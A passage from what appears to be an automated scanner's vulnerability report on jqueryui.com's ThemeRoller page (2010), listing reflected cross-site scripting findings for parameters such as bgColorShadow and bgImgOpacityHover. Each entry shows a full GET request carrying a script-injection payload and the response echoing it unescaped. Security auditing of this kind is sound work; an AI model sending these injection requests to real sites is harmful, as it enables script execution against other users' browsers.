d42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad15a0"><script>alert(1)</script>217cbbbdb46&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.79. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the href attribute (enclosed in double quotation marks) of the ThemeRoller stylesheet <link> to /themeroller/css/parseTheme.css.php; the response excerpt below shows the end of that attribute and the remainder of the tag (type="text/css" media="all" />), so the injected "> terminates the <link> element and the <script> element that follows is parsed as ordinary markup. The payload 269fe"><script>alert(1)</script>439a3d5399f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa269fe"><script>alert(1)</script>439a3d5399f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa269fe"><script>alert(1)</script>439a3d5399f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.80. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dc2"><script>alert(1)</script>12595aecc6f was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d9dc2"><script>alert(1)</script>12595aecc6f&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d9dc2"><script>alert(1)</script>12595aecc6f&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColor
...[SNIP]...

1.81. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 185a3"><script>alert(1)</script>34ca88f4fe4 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100185a3"><script>alert(1)</script>34ca88f4fe4&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100185a3"><script>alert(1)</script>34ca88f4fe4&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefaul
...[SNIP]...

1.82. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f57"><script>alert(1)</script>5e1c6a7f15e was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85c9f57"><script>alert(1)</script>5e1c6a7f15e&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85c9f57"><script>alert(1)</script>5e1c6a7f15e&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgC
...[SNIP]...

1.83. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b8b2"><script>alert(1)</script>00429556b7d was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958b8b2"><script>alert(1)</script>00429556b7d&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
c88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958b8b2"><script>alert(1)</script>00429556b7d&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.84. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 130b6"><script>alert(1)</script>0e302696b6e was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55130b6"><script>alert(1)</script>0e302696b6e&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55130b6"><script>alert(1)</script>0e302696b6e&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorCon
...[SNIP]...

1.85. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6928"><script>alert(1)</script>b2990def5f7 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c6928"><script>alert(1)</script>b2990def5f7&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c6928"><script>alert(1)</script>b2990def5f7&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.86. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9584"><script>alert(1)</script>091e2ef46ee was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75a9584"><script>alert(1)</script>091e2ef46ee&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75a9584"><script>alert(1)</script>091e2ef46ee&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd
...[SNIP]...

1.87. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be7a0"><script>alert(1)</script>49a1231156c was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0be7a0"><script>alert(1)</script>49a1231156c&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
